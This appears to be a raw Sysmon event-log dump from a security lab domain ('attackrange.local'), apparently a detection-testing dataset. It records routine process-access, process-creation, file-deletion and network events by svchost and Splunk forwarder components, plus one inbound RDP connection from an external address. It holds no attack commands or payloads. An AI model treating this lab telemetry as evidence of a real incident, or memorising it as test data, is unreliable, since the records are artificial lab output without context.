08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.585{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000810337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.163{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse95.53.247.168shpd-95-53-247-168.vologda.ru22652-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000810336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.068{0C1E0330-F83E-60EB-E079-00000000D001}25562988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:28.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A743D074D9FF61BCD119D208FB6D40D,SHA256=BB78BA8F00A93AC421C12A9DB327635895C808F751829BC455F6EA7F2DF45E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59AC4C8F32320048C01C8A8EC00000DC,SHA256=5CD4A68D9AE899A2B06F264CB220F22977A5F3BAA9E0868E08EA1E0C4CFFA853,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.287{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:28.272{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.272{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:28.272{0C1E0330-F840-60EB-E279-00000000D001}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:29.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6741CC7483C58132B8312394E11C134,SHA256=ABACF3389CD6D8F533D5D4C7AFC97A8FDB3A5E737C7CEC20032140910A04CB3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:29.597{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AFBE331084E747BAF5B053D1D4A3D3E,SHA256=B30834A2725E740B6C521F2439A5DAD55CF3C1C06A3FC2DDCFE59C270234D3B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:21.610{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61965-false10.0.1.12-8000- 23542300x8000000000000000810368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
